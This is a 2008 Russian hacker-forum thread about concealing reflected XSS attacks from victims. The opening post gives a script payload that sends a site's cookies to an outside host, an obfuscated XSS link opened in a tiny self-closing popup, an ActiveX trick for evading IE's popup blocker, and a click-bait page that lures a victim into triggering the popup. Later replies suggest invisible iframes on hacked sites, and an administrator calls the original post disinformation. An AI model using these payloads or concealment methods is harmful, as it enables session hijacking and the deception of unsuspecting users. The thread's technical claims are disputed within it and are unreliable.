Маскировка пассивных Xss

Discussion in 'Уязвимости' started by ZET36, 7 Apr 2008.

  1. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    И так разработкой данного метода маскировки меня сподвигла
    огромная актуальность пассивных xss уязвимостей . как минимум каждый 2рой сайт в рунете уязвим

    но вот загвоздка этих атак заключается в там что не каждый юзер пойдёт по ссылке типа

    Code:
    http://irc.run.net/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic<script>img = new Image(); img.src = "http://antichat.org/s/red.gif?"+document.cookie;</script>
    да и перенапрвление не даёт должной беспаливности так как оказываясь перенаправленным юзер конешно увидит url .
    идеальным бы казалось спрятать страницу с хсс в невидимый фрэйм. но вот куки с него неидут так как фрэйм находится на другом домене

    остались всплывающие окна. конешно не идеальный вариант маскировки но всёрвно неплохой (например заходит жертва на нашу страницу вылетает маленькое окошко 1 на 1 . автоматом он думает что это реклама и закрывает его темболее в следующих скриптах приведён пример самостоятельного закрытия этого окошка при передаче куков)


    но есть одно НО во всех браузерах есть предупреждение всплывающих окон а у некоторых они отключены вообще

    в принципе обход блокировки сплывающих окон в ie можно обойти с помощью ActiveX

    Code:
    <object id=x classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A width=1 height=1 align=middle> 
    <PARAM NAME=ActivateApplets VALUE=1><PARAM NAME=ActivateActiveXControls VALUE=1></object> 
    <SCRIPT> 
    
    function shellscript() 
    { 
    var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
    
    msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
    setTimeout('   msgWindow.close()   ',4000) 
    } 
    
    function main() 
    { 
    	x.DOM.Script.execScript(shellscript.toString()); 
    	x.DOM.Script.setTimeout("shellscript()"); 
    } 
    
    if (window.rasta!=true) { 
    	setTimeout('   main()   ',100) 
    } 
    </script>
    
    где в переменной xss_site зашифрованным в unescape содержится ссылка с xss (просто взял в пример алерт
    http://irc.kgts.ru/cgi-bin/irc.cgi?item=fmain&interface=ie&style=gothic"><script>alert(1)</script>)

    но вот в Опере и Лисе ActiveX вообще нету. что же делать?

    наверно вы обратили внимание что при механическом клике на ссылку никакой блокировки не всплывает. а вот если функция её вызывает клик автоматом
    скажем так

    Code:
    <form name="f">
    <input type="button" name="n" onClick="zet()">
    </form>
    
    <script>
    document.f.n.click();
    
    function zet()
    {
    msgWindow=open("http://www.yandex.ru/","rastabzc","width=1,height=1'");
    }
    </script>
    то блокировка всёравно как не жалко присутствует

    остаётся только как можно хитрее поступить с механическим кликом (тоесть заставить жертву не только зайти на страницу но ещё и щёлкнуть по ней мышкой)

    прибегнем немножко к социнженерии

    Code:
    <body onclick='zet()'>
    
    <script>
    function zet()
    {
    var xss_site = unescape("%68%74%74%70%3A%2F%2F%69%72%63%2E%6B%67%74%73%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%69%72%63%2E%63%67%69%3F%69%74%65%6D%3D%66%6D%61%69%6E%26%69%6E%74%65%72%66%61%63%65%3D%69%65%26%73%74%79%6C%65%3D%67%6F%74%68%69%63%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E");
    msgWindow=open(xss_site,"rastabzc","width=1,height=1'");
    setTimeout('   msgWindow.close()   ',4000); 
    }
    </script>
    </body>
    
    помимо этого кода в странице должно быть чтонибуть интересное что бы заставило нажать жертву на кнопку


    Но я неочень люблю Соц инженерию (особенно представляться блондинкой с большой грудью просящей посмотреть на фотки.exe или что то в этом роде). хотелось бы сделать атаку как можно автоматизированее

    и вот меня осенило что если сделать это механическое нажатие вынужденным ( ну тоесть когда на странице выскакивает алерт или ошибка мы сначало должны его закрыть а потом уже страницу. (закрыть сразу страницу с открытм алертом неполучиться) и собственно что бы её закрыть мы должны по ней щёлкнуть мышью)

    вот вам пример вынужденного механического нажатия. кто поможет реализовать этот метод буду очень благодарен
    кому интересно прошу развивать тему
     
    #1 ZET36, 7 Apr 2008
    Last edited: 7 Apr 2008
    1 person likes this.
  2. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    был какой то сайт, там вводиш урл пассивки, он тебе даёт урл переадресации с ихнего сайта на эту пассивку, то есть пассивки в урл незаметно, ну можно правдо определить по урлу на этот сайт.
     
  3. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    что то непонимаю как такое можно реализовать, простая переадресация всёравно выкидывает юзера на страницу с хсс где он обнаружит что то неладное.
     
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    ИМХО самое актуальное - это вставлять xss в невидимый ифрейм на поломанном сайте и кинуть ссылку недругу. Так и урла не видно, и можно xss через POST сделать
     
    _________________________
  5. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    авторизованные куки через ифрэйм как не жаль не будут ийти так как страница с фреймом находится на другом домене.

    можеш сам проверить например вставь в фрэйм сайт где у тебя запомнен пароль. ну тоесть при обычном вызове этого сайта ты будеш авторизирован а через фрэйм нет
     
  6. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    ~Real F@ck!~, https://forum.antichat.ru/thread43786.html
    ZET36, почему я не верю?
    Перестаньте нести дезинформацию в народ.
     
    _________________________